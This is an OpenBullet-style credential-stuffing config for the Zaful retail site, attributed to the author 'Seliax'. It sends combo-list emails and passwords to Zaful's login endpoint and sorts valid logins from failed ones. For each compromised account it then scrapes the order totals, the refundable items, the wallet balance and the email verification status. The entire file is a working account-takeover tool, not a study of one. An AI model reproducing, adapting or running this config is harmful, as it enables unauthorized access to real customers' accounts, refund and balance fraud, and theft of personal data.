[SETTINGS]
{
  "Name": "Zaful",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-09-16T23:38:57.4938663+00:00",
  "AdditionalInfo": "",
  "Author": "Seliax",
  "Version": "1.3.9 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://user.zaful.com/m-users-a-act_sign.htm?pipeline=zf" 
  CONTENT "email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "origin: https://user.zaful.com" 
  HEADER "referer: https://user.zaful.com/sign-up.html" 
  HEADER "x-requested-with: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Your email\\/password is incorrect. Please try again.\"}" 
  KEYCHAIN Success OR 
    KEY "Successfully sign" 

REQUEST GET "https://user.zaful.com/m-users-a-order_list.htm" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<span class=\"next-btn\"></span></a></td><td>" "</td><td><span" Recursive=TRUE -> VAR "Order" 

FUNCTION CountOccurrences "at" "<Order>" -> CAP "Total Order Numbers" 

PARSE "<SOURCE>" LR "span class=\"next-btn\"></span></a></td><td>" "</td><td><span" -> VAR "ewx" 

FUNCTION CountOccurrences "2019" "<ewx>" -> CAP "Total Orders at 2019" 

PARSE "<SOURCE>" LR "</td><td style=\"text-align:left;width:100px;\" class=\"logsss_event_ps pay-wrap\"" "button id=\"js_dateSubmit\"" -> VAR "call" 

FUNCTION CountOccurrences "Request a refund" "<call>" -> CAP "Total Refundable Items" 

REQUEST GET "https://user.zaful.com/m-users-a-wallet.htm" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "class=\"my_shop_price\" data-orgp=\"" "</span></dd></dl><dl class=\"fl\"><" -> VAR "Balanc" 

FUNCTION Replace "\">" " | " "<Balanc>" -> CAP "Total Balance" 

REQUEST GET "https://user.zaful.com/m-users-a-profile.htm" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "class=\"email-" "\">" Recursive=TRUE -> VAR "isVerifiedd" 

FUNCTION Replace "text" "" "<isVerifiedd>" -> VAR "ISIT" 

FUNCTION Replace "hint" "" "<ISIT>" -> VAR "isVerified" 

FUNCTION Replace "," "" "<isVerified>" -> VAR "ivsVerified" 

FUNCTION Replace " " "" "<ivsVerified>" -> VAR "ISHEX" 

FUNCTION Replace "icon" "" "<ISHEX>" -> VAR "WAHAHA" 

FUNCTION Replace "-" "" "<WAHAHA>" -> VAR "CLEAN" 

FUNCTION ToUppercase "<CLEAN>" -> CAP "isVerified?" 

